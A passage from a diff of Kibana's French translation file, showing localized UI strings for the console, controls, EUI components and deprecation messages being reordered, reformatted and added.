"console.deprecations.proxyConfigTitle": "Le paramètre \"console.proxyConfig\" est déclassé", "console.deprecations.proxyFilter.manualStepOneMessage": "Ouvrez le fichier de configuration kibana.yml.", "console.deprecations.proxyFilter.manualStepThreeMessage": "Configurez la connexion sécurisée entre Kibana et Elasticsearch à l'aide des paramètres \"server.ssl.*\".", "console.deprecations.proxyFilter.manualStepTwoMessage": "Supprimez le paramètre \"console.proxyFilter\".", - "console.deprecations.proxyFilterMessage": "La configuration de \"console.proxyFilter\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", + "console.deprecations.proxyFilterMessage": "La configuration de \"console.proxyFilter\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", "console.deprecations.proxyFilterTitle": "Le paramètre \"console.proxyFilter\" est déclassé", - "console.devToolsDescription": "Plutôt que l’interface cURL, utilisez une interface JSON pour exploiter vos données dans la console.", + "console.devToolsDescription": "Plutôt que l’interface cURL, utilisez une interface JSON pour exploiter vos données dans la console.", "console.devToolsTitle": "Interagir avec l'API Elasticsearch", "console.exampleOutputTextarea": "Outils de développement de la console - Exemple d’éditeur", "console.helpPage.keyboardCommands.autoIndentDescription": "Appliquer un retrait automatique à la requête en cours", @@ -1176,14 +228,12 @@ "console.helpPage.keyboardCommands.submitRequestDescription": "Envoyer la requête", "console.helpPage.keyboardCommands.switchFocusToAutoCompleteMenuDescription": "Permet d’accéder au menu de saisie semi-automatique. Utilisez les flèches pour sélectionner un terme.", "console.helpPage.keyboardCommandsTitle": "Commandes du clavier", - "console.helpPage.learnAboutConsoleAndQueryDslText": "Découvrez plus d'informations sur {console} et {queryDsl}", "console.helpPage.pageTitle": "Aide", "console.helpPage.requestFormatDescription": "Vous pouvez saisir une ou plusieurs requêtes dans l'éditeur. La console est compatible avec les requêtes dans un format compact.", "console.helpPage.requestFormatTitle": "Format de la requête", "console.historyPage.applyHistoryButtonLabel": "Appliquer", "console.historyPage.clearHistoryButtonLabel": "Effacer", "console.historyPage.closehistoryButtonLabel": "Fermer", - "console.historyPage.itemOfRequestListAriaLabel": "Requête : {historyItem}", "console.historyPage.noHistoryTextMessage": "Aucun historique disponible", "console.historyPage.pageTitle": "Historique", "console.historyPage.requestListAriaLabel": "Historique des requêtes envoyées", @@ -1215,14 +265,13 @@ "console.settingsPage.fontSizeLabel": "Taille de la police", "console.settingsPage.historyLabel": "Historique", "console.settingsPage.indicesAndAliasesLabelText": "Index et alias", - "console.settingsPage.jsonSyntaxLabel": "Syntaxe JSON", + "console.settingsPage.jsonSyntaxLabel": "Syntaxe JSON", "console.settingsPage.keyboardShortcutsLabel": "Raccourcis clavier", "console.settingsPage.pageTitle": "Paramètres de la console", "console.settingsPage.refreshButtonLabel": "Actualiser les suggestions de saisie semi-automatique", "console.settingsPage.refreshingDataDescription": "La console actualise les suggestions de saisie semi-automatique en interrogeant Elasticsearch. Une actualisation moins fréquente est recommandée pour réduire les coûts de bande passante.", "console.settingsPage.refreshingDataLabel": "Fréquence d'actualisation", "console.settingsPage.refreshInterval.everyHourTimeInterval": "Toutes les heures", - "console.settingsPage.refreshInterval.everyNMinutesTimeInterval": "Toutes les {value} {value, plural, one {minute} other {minutes}}", "console.settingsPage.refreshInterval.onceTimeInterval": "Une fois, au chargement de la console", "console.settingsPage.saveButtonLabel": "Enregistrer", "console.settingsPage.savingRequestsToHistoryMessage": "Désactiver l'enregistrement des requêtes dans l'historique", @@ -1236,18 +285,36 @@ "console.topNav.historyTabLabel": "Historique", "console.topNav.settingsTabDescription": "Paramètres", "console.topNav.settingsTabLabel": "Paramètres", + "console.topNav.variablesTabDescription": "Variables", + "console.topNav.variablesTabLabel": "Variables", + "console.variablesPage.addButtonLabel": "Ajouter", + "console.variablesPage.cancelButtonLabel": "Annuler", + "console.variablesPage.pageTitle": "Variables", + "console.variablesPage.saveButtonLabel": "Enregistrer", + "console.variablesPage.variablesTable.columns.valueHeader": "Valeur", + "console.variablesPage.variablesTable.columns.variableHeader": "Nom de la variable", + "console.variablesPage.variablesTable.valueInput.ariaLabel": "Valeur de la variable", + "console.variablesPage.variablesTable.variableInput.ariaLabel": "Nom de la variable", + "console.variablesPage.variablesTable.variableInputError.validCharactersText": "Seuls les chiffres et les lettres sont autorisés", "console.welcomePage.closeButtonLabel": "Rejeter", "console.welcomePage.pageTitle": "Bienvenue dans la console", - "console.welcomePage.quickIntroDescription": "L'interface utilisateur de la console est divisée en deux volets : un volet éditeur (à gauche) et un volet de réponse (à droite). L'éditeur permet de saisir des requêtes et de les envoyer à Elasticsearch, tandis que le volet de réponse affiche les résultats.", + "console.welcomePage.quickIntroDescription": "L'interface utilisateur de la console est divisée en deux volets : un volet éditeur (à gauche) et un volet de réponse (à droite). L'éditeur permet de saisir des requêtes et de les envoyer à Elasticsearch, tandis que le volet de réponse affiche les résultats.", "console.welcomePage.quickIntroTitle": "Introduction rapide à l'interface utilisateur", - "console.welcomePage.quickTips.cUrlFormatForRequestsDescription": "Vous pouvez coller des requêtes au format cURL ; elles seront automatiquement traduites dans la syntaxe de la console.", + "console.welcomePage.quickTips.cUrlFormatForRequestsDescription": "Vous pouvez coller des requêtes au format cURL ; elles seront automatiquement traduites dans la syntaxe de la console.", "console.welcomePage.quickTips.keyboardShortcutsDescription": "N’hésitez pas à jeter un œil aux raccourcis clavier sous le bouton Aide. Vous pourriez y trouver des choses utiles.", "console.welcomePage.quickTips.resizeEditorDescription": "Vous pouvez redimensionner les volets de l'éditeur et de réponse en faisant glisser le séparateur situé entre les deux.", "console.welcomePage.quickTips.submitRequestDescription": "Utilisez l’icône de triangle vert pour envoyer vos requêtes à ES.", "console.welcomePage.quickTips.useWrenchMenuDescription": "Cliquez sur l’icône en forme de clé pour découvrir d'autres éléments utiles.", - "console.welcomePage.quickTipsTitle": "Quelques brèves astuces, pendant que j'ai toute votre attention :", + "console.welcomePage.quickTipsTitle": "Quelques brèves astuces, pendant que j'ai toute votre attention :", "console.welcomePage.supportedRequestFormatDescription": "Lors de la saisie d'une requête, la console fera des suggestions que vous pourrez accepter en appuyant sur Entrée/Tab. Ces suggestions sont faites en fonction de la structure de la requête, des index et des types.", - "console.welcomePage.supportedRequestFormatTitle": "La console prend en charge les requêtes dans un format compact, tel que le format cURL :", + "console.welcomePage.supportedRequestFormatTitle": "La console prend en charge les requêtes dans un format compact, tel que le format cURL :", + "controls.controlGroup.ariaActions.moveControlButtonAction": "Déplacer le contrôle {controlTitle}", + "controls.optionsList.errors.dataViewNotFound": "Impossible de localiser la vue de données : {dataViewId}", + "controls.optionsList.popover.cardinalityPlaceholder": "Rechercher {totalOptions} {totalOptions, plural, one {option disponible} other {options disponibles}}", + "controls.optionsList.popover.cardinalityTooltip": "{totalOptions} options disponibles.", + "controls.optionsList.popover.invalidSelectionsSectionTitle": "{invalidSelectionCount, plural, one {Sélection ignorée} other {Sélections ignorées}}", + "controls.optionsList.popover.invalidSelectionsTitle": "{invalidSelectionCount} options sélectionnées ignorées", + "controls.optionsList.popover.invalidSelectionsTooltip": "{selectedOptions} {selectedOptions, plural, one {option sélectionnée} other {options sélectionnées}} {selectedOptions, plural, one {est ignorée} other {sont ignorées}}, car {selectedOptions, plural, one {elle n'est plus présente} other {elles ne sont plus présentes}} dans les données.", "controls.controlGroup.emptyState.addControlButtonTitle": "Ajouter un contrôle", "controls.controlGroup.emptyState.badgeText": "Nouveauté", "controls.controlGroup.emptyState.callToAction": "Le filtrage des données s'est amélioré grâce aux contrôles, qui vous permettent d'afficher uniquement les données que vous souhaitez explorer.", @@ -1273,18 +340,18 @@ "controls.controlGroup.management.delete": "Supprimer le contrôle", "controls.controlGroup.management.delete.cancel": "Annuler", "controls.controlGroup.management.delete.confirm": "Supprimer", - "controls.controlGroup.management.delete.deleteAllTitle": "Supprimer tous les contrôles ?", - "controls.controlGroup.management.delete.deleteTitle": "Supprimer le contrôle ?", + "controls.controlGroup.management.delete.deleteAllTitle": "Supprimer tous les contrôles ?", + "controls.controlGroup.management.delete.deleteTitle": "Supprimer le contrôle ?", "controls.controlGroup.management.delete.sub": "Une fois supprimés, les contrôles ne peuvent pas être récupérés.", "controls.controlGroup.management.deleteAll": "Tout supprimer", "controls.controlGroup.management.deleteNew.cancel": "Annuler", "controls.controlGroup.management.deleteNew.confirm": "Supprimer le contrôle", - "controls.controlGroup.management.deleteNew.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", + "controls.controlGroup.management.deleteNew.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", "controls.controlGroup.management.deleteNew.title": "Supprimer le nouveau contrôle", "controls.controlGroup.management.discard.cancel": "Annuler", "controls.controlGroup.management.discard.confirm": "Abandonner les modifications", - "controls.controlGroup.management.discard.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", - "controls.controlGroup.management.discard.title": "Abandonner les modifications ?", + "controls.controlGroup.management.discard.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", + "controls.controlGroup.management.discard.title": "Abandonner les modifications ?", "controls.controlGroup.management.flyoutTitle": "Paramètres du contrôle", "controls.controlGroup.management.hierarchy.subtitle": "Les sélections dans un contrôle diminuent les options disponibles dans le suivant. Les contrôles se suivent de gauche à droite.", "controls.controlGroup.management.hierarchy.title": "Contrôles à la suite", @@ -1312,19 +379,12 @@ "controls.optionsList.editor.allowMultiselectTitle": "Permettre des sélections multiples dans une liste déroulante", "controls.optionsList.editor.runPastTimeout": "Exécuter après expiration du délai", "controls.optionsList.popover.allOptionsTitle": "Afficher toutes les options", - "controls.optionsList.popover.cardinalityPlaceholder": "Rechercher {totalOptions} {totalOptions, plural, one {option disponible} other {options disponibles}}", - "controls.optionsList.popover.cardinalityTooltip": "{totalOptions} options disponibles.", "controls.optionsList.popover.clearAllSelectionsTitle": "Effacer les sélections", "controls.optionsList.popover.empty": "Aucune option trouvée", "controls.optionsList.popover.invalidSelectionsAriaLabel": "Désélectionnez toutes les sélections ignorées", - "controls.optionsList.popover.invalidSelectionsSectionTitle": "{invalidSelectionCount, plural, one {Sélection ignorée} other {Sélections ignorées}}", - "controls.optionsList.popover.invalidSelectionsTitle": "{invalidSelectionCount} options sélectionnées ignorées", - "controls.optionsList.popover.invalidSelectionsTooltip": "{selectedOptions} {selectedOptions, plural, one {option sélectionnée} other {options sélectionnées}} {selectedOptions, plural, one {est ignorée} other {sont ignorées}}, car {selectedOptions, plural, one {elle n'est plus présente} other {elles ne sont plus présentes}} dans les données.", "controls.optionsList.popover.loading": "Options de chargement", "controls.optionsList.popover.selectedOptionsTitle": "Afficher uniquement les options sélectionnées", "controls.optionsList.popover.selectionsEmpty": "Vous n'avez pas de sélections", - "controls.optionsList.control.placeholder": "Sélectionner…", - "controls.optionsList.control.separator": ", ", "controls.rangeSlider.description": "Ajoutez un contrôle pour la sélection d'une plage de valeurs de champ.", "controls.rangeSlider.displayName": "Curseur de plage", "controls.rangeSlider.editor.dataViewTitle": "Vue de données", @@ -1342,40 +402,154 @@ "controls.timeSlider.editor.noDataViewTitle": "Sélectionner la vue de données", "controls.timeSlider.noDocuments.label": "Aucun document n'a été trouvé. Sélection de plage non disponible.", "controls.timeSlider.resetButton.label": "Réinitialiser les sélections", + "core.chrome.browserDeprecationWarning": "La prise en charge d'Internet Explorer sera abandonnée dans les futures versions de ce logiciel. Veuillez consulter le site {link}.", + "core.deprecations.deprecations.fetchFailedMessage": "Impossible d'extraire les informations de déclassement pour le plug-in {domainId}.", + "core.deprecations.deprecations.fetchFailedTitle": "Impossible d'extraire les déclassements pour {domainId}", + "core.deprecations.elasticsearchSSL.manualSteps1": "Ajoutez le paramètre \"{missingSetting}\" à kibana.yml.", + "core.deprecations.elasticsearchSSL.manualSteps2": "Si vous ne souhaitez pas utiliser l'authentification TLS mutuelle, vous pouvez aussi supprimer \"{existingSetting}\" dans kibana.yml.", + "core.deprecations.elasticsearchSSL.message": "Utilisez à la fois \"{existingSetting}\" et \"{missingSetting}\" afin d'activer Kibana pour utiliser l'authentification TLS mutuelle avec Elasticsearch.", + "core.deprecations.elasticsearchSSL.title": "L'utilisation de \"{existingSetting}\" sans \"{missingSetting}\" n'a pas d'effet", + "core.deprecations.elasticsearchUsername.message": "Kibana est configuré pour l'authentification sur Elasticsearch avec l'utilisateur \"{username}\". Utilisez plutôt un jeton de compte de service.", + "core.deprecations.elasticsearchUsername.title": "L'utilisation de \"elasticsearch.username: {username}\" est déclassée", + "core.euiAbsoluteTab.dateFormatError": "Format attendu : {dateFormat}", + "core.euiAutoRefresh.buttonLabelOn": "L'actualisation automatique est activée et définie sur {prettyInterval}", + "core.euiBasicTable.tableAutoCaptionWithoutPagination": "Ce tableau contient {itemCount} lignes.", + "core.euiBasicTable.tableAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes sur {totalItemCount} lignes au total ; page {page} sur {pageCount}.", + "core.euiBasicTable.tableCaptionWithPagination": "{tableCaption} ; page {page} sur {pageCount}.", + "core.euiBasicTable.tablePagination": "Pagination pour le tableau : {tableCaption}", + "core.euiBasicTable.tableSimpleAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes ; page {page} sur {pageCount}.", + "core.euiBottomBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", + "core.euiColorPickerSwatch.ariaLabel": "Sélection de la couleur {color}", + "core.euiColorStops.screenReaderAnnouncement": "{label} : {readOnly} {disabled} Sélecteur d'arrêt de couleur. Chaque arrêt consiste en un nombre et en une valeur de couleur correspondante. Utilisez les flèches haut et bas pour sélectionner les arrêts. Appuyez sur Entrée pour créer un nouvel arrêt.", + "core.euiColumnActions.sort": "Trier {schemaLabel}", + "core.euiColumnSelector.buttonActivePlural": "{numberOfHiddenFields} colonnes masquées", + "core.euiColumnSelector.buttonActiveSingular": "{numberOfHiddenFields} colonne masquée", + "core.euiColumnSorting.buttonActive": "{numberOfSortedFields, plural, one {# champ trié} other {# champs triés}}", + "core.euiColumnSortingDraggable.activeSortLabel": "{display} trie cette grille de données", + "core.euiColumnSortingDraggable.removeSortLabel": "Retirer {display} du tri de la grille de données", + "core.euiColumnSortingDraggable.toggleLegend": "Sélectionner la méthode de tri pour {display}", + "core.euiComboBoxOptionsList.alreadyAdded": "{label} a déjà été ajouté.", + "core.euiComboBoxOptionsList.createCustomOption": "Ajouter {searchValue} en tant qu'option personnalisée", + "core.euiComboBoxOptionsList.delimiterMessage": "Ajouter chaque élément en séparant par {delimiter}", + "core.euiComboBoxOptionsList.noMatchingOptions": "{searchValue} ne correspond à aucune option.", + "core.euiComboBoxPill.removeSelection": "Supprimer {children} de la sélection de ce groupe", + "core.euiControlBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", + "core.euiDataGrid.ariaLabel": "{label} ; page {page} sur {pageCount}.", + "core.euiDataGrid.ariaLabelledBy": "Page {page} sur {pageCount}.", + "core.euiDataGridCell.position": "{columnId}, colonne {col}, ligne {row}", + "core.euiDataGridPagination.detailedPaginationLabel": "Pagination pour la grille précédente : {label}", + "core.euiDatePopoverButton.invalidTitle": "Date non valide : {title}", + "core.euiDatePopoverButton.outdatedTitle": "Mise à jour requise : {title}", + "core.euiFilePicker.filesSelected": "{fileCount} fichiers sélectionnés", + "core.euiFilterButton.filterBadgeActiveAriaLabel": "{count} filtres actifs", + "core.euiFilterButton.filterBadgeAvailableAriaLabel": "{count} filtres disponibles", + "core.euiMarkdownEditorFooter.supportedFileTypes": "Fichiers pris en charge : {supportedFileTypes}", + "core.euiNotificationEventMessages.accordionAriaLabelButtonText": "+ {messagesLength} messages pour {eventName}", + "core.euiNotificationEventMessages.accordionButtonText": "+ {messagesLength} de plus", + "core.euiNotificationEventMeta.contextMenuButton": "Menu pour {eventName}", + "core.euiNotificationEventReadButton.markAsReadAria": "Marquer {eventName} comme lu", + "core.euiNotificationEventReadButton.markAsUnreadAria": "Marquer {eventName} comme non lu", + "core.euiNotificationEventReadIcon.readAria": "{eventName} lu", + "core.euiNotificationEventReadIcon.unreadAria": "{eventName} non lu", + "core.euiPagination.firstRangeAriaLabel": "Ignorer les pages 2 à {lastPage}", + "core.euiPagination.lastRangeAriaLabel": "Ignorer les pages {firstPage} à {lastPage}", + "core.euiPagination.pageOfTotalCompressed": "{page} sur {total}", + "core.euiPaginationButton.longPageString": "Page {page} sur {totalPages}", + "core.euiPaginationButton.shortPageString": "Page {page}", + "core.euiPrettyDuration.durationRoundedToDay": "{prettyDuration} arrondie au jour", + "core.euiPrettyDuration.durationRoundedToHour": "{prettyDuration} arrondie à l'heure", + "core.euiPrettyDuration.durationRoundedToMinute": "{prettyDuration} arrondie à la minute", + "core.euiPrettyDuration.durationRoundedToMonth": "{prettyDuration} arrondie au mois", + "core.euiPrettyDuration.durationRoundedToSecond": "{prettyDuration} arrondie à la seconde", + "core.euiPrettyDuration.durationRoundedToWeek": "{prettyDuration} arrondie à la semaine", + "core.euiPrettyDuration.durationRoundedToYear": "{prettyDuration} arrondie à l'année", + "core.euiPrettyDuration.fallbackDuration": "{displayFrom} à {displayTo}", + "core.euiPrettyDuration.lastDurationDays": "{duration, plural, one {# dernier jour} other {# derniers jours}}", + "core.euiPrettyDuration.lastDurationHours": "{duration, plural, one {# dernière heure} other {# dernières heures}}", + "core.euiPrettyDuration.lastDurationMinutes": "{duration, plural, one {# dernière minute} other {# dernières minutes}}", + "core.euiPrettyDuration.lastDurationMonths": "{duration, plural, one {# dernier mois} other {# derniers mois}}", + "core.euiPrettyDuration.lastDurationSeconds": "{duration, plural, one {# dernière seconde} other {# dernières secondes}}", + "core.euiPrettyDuration.lastDurationWeeks": "{duration, plural, one {# dernière semaine} other {# dernières semaines}}", + "core.euiPrettyDuration.lastDurationYears": "{duration, plural, one {# dernière année} other {# dernières années}}", + "core.euiPrettyDuration.nextDurationHours": "{duration, plural, one {# prochaine heure} other {# prochaines heures}}", + "core.euiPrettyDuration.nextDurationMinutes": "{duration, plural, one {# prochaine minute} other {# prochaines minutes}}", + "core.euiPrettyDuration.nextDurationMonths": "{duration, plural, one {# prochain mois} other {# prochains mois}}", + "core.euiPrettyDuration.nextDurationSeconds": "{duration, plural, one {# prochaine seconde} other {# prochaines secondes}}", + "core.euiPrettyDuration.nextDurationWeeks": "{duration, plural, one {# prochaine semaine} other {# prochaines semaines}}", + "core.euiPrettyDuration.nextDurationYears": "{duration, plural, one {# prochaine année} other {# prochaines années}}", + "core.euiPrettyDuration.nexttDurationDays": "{duration, plural, one {# prochain jour} other {# prochains jours}}", + "core.euiPrettyInterval.days": "{interval, plural, one {# jour} other {# jours}}", + "core.euiPrettyInterval.daysShorthand": "{interval} d", + "core.euiPrettyInterval.hours": "{interval, plural, one {# heure} other {# heures}}", + "core.euiPrettyInterval.hoursShorthand": "{interval} h", + "core.euiPrettyInterval.minutes": "{interval, plural, one {# minute} other {# minutes}}", + "core.euiPrettyInterval.minutesShorthand": "{interval} m", + "core.euiPrettyInterval.seconds": "{interval, plural, one {# seconde} other {# secondes}}", + "core.euiPrettyInterval.secondsShorthand": "{interval} s", + "core.euiProgress.valueText": "{value} %", + "core.euiQuickSelect.fullDescription": "Actuellement défini sur {timeTense} {timeValue} {timeUnit}.", + "core.euiRefreshInterval.fullDescriptionOff": "L'actualisation est désactivée, intervalle défini sur {optionValue} {optionText}.", + "core.euiRefreshInterval.fullDescriptionOn": "L'actualisation est activée, intervalle défini sur {optionValue} {optionText}.", + "core.euiRelativeTab.fullDescription": "L'unité peut être modifiée. Elle est actuellement définie sur {unit}.", + "core.euiSelectable.noMatchingOptions": "{searchValue} ne correspond à aucune option.", + "core.euiSelectable.searchResults": "{resultsLength, plural, one {# résultat disponible} other {#résultats disponibles}}", + "core.euiStepStrings.complete": "L'étape {number} : {title} est terminée.", + "core.euiStepStrings.current": "L’étape {number} : {title} est en cours.", + "core.euiStepStrings.disabled": "L'étape {number} : {title} est désactivée.", + "core.euiStepStrings.errors": "L'étape {number} : {title} contient des erreurs.", + "core.euiStepStrings.incomplete": "L'étape {number} : {title} est incomplète.", + "core.euiStepStrings.loading": "L'étape {number} : {title} est en cours de chargement.", + "core.euiStepStrings.simpleComplete": "L'étape {number} est terminée.", + "core.euiStepStrings.simpleCurrent": "L’étape {number} est en cours.", + "core.euiStepStrings.simpleDisabled": "L'étape {number} est désactivée.", + "core.euiStepStrings.simpleErrors": "L'étape {number} contient des erreurs.", + "core.euiStepStrings.simpleIncomplete": "L'étape {number} est incomplète.", + "core.euiStepStrings.simpleLoading": "L'étape {number} est en cours de chargement.", + "core.euiStepStrings.simpleStep": "Étape {number}", + "core.euiStepStrings.simpleWarning": "L'étape {number} contient des avertissements.", + "core.euiStepStrings.step": "Étape {number} : {title}", + "core.euiStepStrings.warning": "L'étape {number} : {title} contient des avertissements.", + "core.euiSuperSelectControl.selectAnOption": "Sélectionner une option : l’option {selectedValue} est sélectionnée.", + "core.euiTableHeaderCell.titleTextWithDesc": "{innerText} ; {description}", + "core.euiTablePagination.rowsPerPageOption": "{rowsPerPage} lignes", + "core.euiTourStepIndicator.ariaLabel": "Étape {number} {status}", + "core.euiTreeView.ariaLabel": "{nodeLabel} enfant de {ariaLabel}", + "core.savedObjects.deprecations.unknownTypes.message": "{objectCount, plural, one {# objet} other {# objets}} de type inconnu {objectCount, plural, one {a été trouvé} other {ont été trouvés}} dans les indices du système Kibana. La mise à niveau avec des types savedObject inconnus n'est plus compatible. Pour assurer la réussite des mises à niveau à l'avenir, réactivez les plug-ins ou supprimez ces documents dans les indices de Kibana", + "core.statusPage.loadStatus.serverStatusCodeErrorMessage": "Échec de requête du statut du serveur avec le code de statut {responseStatus}.", + "core.statusPage.serverStatus.statusTitle": "Statut Kibana : {kibanaStatus}", + "core.statusPage.statusApp.statusActions.buildText": "BUILD : {buildNum}", + "core.statusPage.statusApp.statusActions.commitText": "COMMIT : {buildSha}", + "core.statusPage.statusApp.statusActions.versionText": "VERSION : {versionNum}", + "core.ui_settings.params.dateFormat.scaledText": "Les valeurs qui définissent le format utilisé lorsque les données temporelles sont rendues dans l'ordre, et lorsque les horodatages formatés doivent s'adapter à l'intervalle entre les mesures. Les clés sont {intervalsLink}.", + "core.ui_settings.params.dateFormat.timezone.invalidValidationMessage": "Fuseau horaire non valide : {timezone}", + "core.ui_settings.params.dateFormatText": "Le {formatLink} pour des dates joliment formatées.", + "core.ui_settings.params.dateNanosFormatText": "Le format pour les données {dateNanosLink}.", + "core.ui_settings.params.dayOfWeekText.invalidValidationMessage": "Jour de la semaine non valide : {dayOfWeek}", + "core.ui_settings.params.notifications.bannerText": "Une bannière personnalisée à des fins de notification temporaire de l’ensemble des utilisateurs. {markdownLink}.", + "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackOnApp": "Donner un retour sur {appName}", + "core.ui.chrome.headerGlobalNav.helpMenuVersion": "v {version}", + "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage": "Activez l'option {storeInSessionStorageParam} dans les {advancedSettingsLink} ou simplifiez les visuels à l'écran.", + "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText": "Activez l'option {storeInSessionStorageConfig} sous {kibanaSettingsLink}.", + "core.ui.primaryNavSection.screenReaderLabel": "Liens de navigation principale, {category}", + "core.ui.publicBaseUrlWarning.configRecommendedDescription": "Dans un environnement de production, il est recommandé de configurer {configKey}.", + "core.ui.recentLinks.linkItem.screenReaderLabel": "{recentlyAccessedItemLinklabel}, type : {pageType}", "core.application.appContainer.loadingAriaLabel": "Chargement de l'application", "core.application.appNotFound.pageDescription": "Aucune application détectée pour cette URL. Revenez en arrière ou sélectionnez une application dans le menu.", "core.application.appNotFound.title": "Application introuvable", "core.application.appRenderError.defaultTitle": "Erreur d'application", - "core.chrome.browserDeprecationLink": "la matrice de prise en charge sur notre site web", - "core.chrome.browserDeprecationWarning": "La prise en charge d'Internet Explorer sera abandonnée dans les futures versions de ce logiciel. Veuillez consulter le site {link}.", + "core.chrome.browserDeprecationLink": "la matrice de prise en charge sur notre site web", "core.chrome.legacyBrowserWarning": "Votre navigateur ne satisfait pas aux exigences de sécurité de Kibana.", "core.deprecations.deprecations.fetchFailed.manualStepOneMessage": "Vérifiez le message d'erreur dans les logs de serveur Kibana.", - "core.deprecations.deprecations.fetchFailedMessage": "Impossible d'extraire les informations de déclassement pour le plug-in {domainId}.", - "core.deprecations.deprecations.fetchFailedTitle": "Impossible d'extraire les déclassements pour {domainId}", - "core.deprecations.elasticsearchSSL.manualSteps1": "Ajoutez le paramètre \"{missingSetting}\" à kibana.yml.", - "core.deprecations.elasticsearchSSL.manualSteps2": "Si vous ne souhaitez pas utiliser l'authentification TLS mutuelle, vous pouvez aussi supprimer \"{existingSetting}\" dans kibana.yml.", - "core.deprecations.elasticsearchSSL.message": "Utilisez à la fois \"{existingSetting}\" et \"{missingSetting}\" afin d'activer Kibana pour utiliser l'authentification TLS mutuelle avec Elasticsearch.", - "core.deprecations.elasticsearchSSL.title": "L'utilisation de \"{existingSetting}\" sans \"{missingSetting}\" n'a pas d'effet", "core.deprecations.elasticsearchUsername.manualSteps1": "Utilisez l'outil CLI elasticsearch-service-tokens afin de créer un jeton pour le compte de service \"elastic/kibana\".", "core.deprecations.elasticsearchUsername.manualSteps2": "Ajoutez le paramètre \"elasticsearch.serviceAccountToken\" à kibana.yml.", "core.deprecations.elasticsearchUsername.manualSteps3": "Supprimez \"elasticsearch.username\" et \"elasticsearch.password\" de kibana.yml.", - "core.deprecations.elasticsearchUsername.message": "Kibana est configuré pour l'authentification sur Elasticsearch avec l'utilisateur \"{username}\". Utilisez plutôt un jeton de compte de service.", - "core.deprecations.elasticsearchUsername.title": "L'utilisation de \"elasticsearch.username: {username}\" est déclassée", "core.deprecations.noCorrectiveAction": "Ce déclassement ne peut pas être résolu automatiquement.", - "core.euiAbsoluteTab.dateFormatError": "Format attendu : {dateFormat}", "core.euiAccordion.isLoading": "Chargement", "core.euiAutoRefresh.autoRefreshLabel": "Actualisation automatique", "core.euiAutoRefresh.buttonLabelOff": "L'actualisation automatique est désactivée", - "core.euiAutoRefresh.buttonLabelOn": "L'actualisation automatique est activée et définie sur {prettyInterval}", "core.euiBasicTable.noItemsMessage": "Aucun élément n'a été trouvé", "core.euiBasicTable.selectAllRows": "Sélectionner toutes les lignes", "core.euiBasicTable.selectThisRow": "Sélectionner cette ligne", - "core.euiBasicTable.tableAutoCaptionWithoutPagination": "Ce tableau contient {itemCount} lignes.", - "core.euiBasicTable.tableAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes sur {totalItemCount} lignes au total ; page {page} sur {pageCount}.", - "core.euiBasicTable.tableCaptionWithPagination": "{tableCaption} ; page {page} sur {pageCount}.", - "core.euiBasicTable.tablePagination": "Pagination pour le tableau : {tableCaption}", - "core.euiBasicTable.tableSimpleAutoCaptionWithPagination": "Ce tableau contient {itemCount} lignes ; page {page} sur {pageCount}.", - "core.euiBottomBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", "core.euiBottomBar.screenReaderAnnouncement": "Il y a un nouveau repère de région avec des commandes de niveau de page à la fin du document.", "core.euiBottomBar.screenReaderHeading": "Commandes de niveau de page", "core.euiBreadcrumbs.collapsedBadge.ariaLabel": "Voir le fil d’Ariane réduit", @@ -1394,8 +568,6 @@ "core.euiColorPicker.openLabel": "Appuyez sur Échap pour fermer la fenêtre contextuelle.", "core.euiColorPicker.popoverLabel": "Boîte de dialogue de sélection de couleur", "core.euiColorPicker.transparent": "Transparent", - "core.euiColorPickerSwatch.ariaLabel": "Sélection de la couleur {color}", - "core.euiColorStops.screenReaderAnnouncement": "{label} : {readOnly} {disabled} Sélecteur d'arrêt de couleur. Chaque arrêt consiste en un nombre et en une valeur de couleur correspondante. Utilisez les flèches haut et bas pour sélectionner les arrêts. Appuyez sur Entrée pour créer un nouvel arrêt.", "core.euiColorStopThumb.buttonAriaLabel": "Appuyez sur Entrée pour modifier cet arrêt. Appuyez sur Échap pour revenir au groupe.", "core.euiColorStopThumb.buttonTitle": "Cliquez pour modifier, faites glisser pour repositionner.", "core.euiColorStopThumb.removeLabel": "Supprimer cet arrêt", @@ -1405,44 +577,30 @@ "core.euiColumnActions.hideColumn": "Masquer la colonne", "core.euiColumnActions.moveLeft": "Déplacer vers la gauche", "core.euiColumnActions.moveRight": "Déplacer vers la droite", - "core.euiColumnActions.sort": "Trier {schemaLabel}", "core.euiColumnSelector.button": "Colonnes", - "core.euiColumnSelector.buttonActivePlural": "{numberOfHiddenFields} colonnes masquées", - "core.euiColumnSelector.buttonActiveSingular": "{numberOfHiddenFields} colonne masquée", "core.euiColumnSelector.hideAll": "Tout masquer", "core.euiColumnSelector.search": "Recherche", "core.euiColumnSelector.searchcolumns": "Rechercher dans les colonnes", "core.euiColumnSelector.selectAll": "Afficher tout", "core.euiColumnSorting.button": "Trier les champs", - "core.euiColumnSorting.buttonActive": "{numberOfSortedFields, plural, one {# champ trié} other {# champs triés}}", "core.euiColumnSorting.clearAll": "Annuler le tri", "core.euiColumnSorting.emptySorting": "Aucun champ n'est trié actuellement.", "core.euiColumnSorting.pickFields": "Sélectionner les champs de tri", - "core.euiColumnSorting.sortFieldAriaLabel": "Trier par :", - "core.euiColumnSortingDraggable.activeSortLabel": "{display} trie cette grille de données", + "core.euiColumnSorting.sortFieldAriaLabel": "Trier par :", 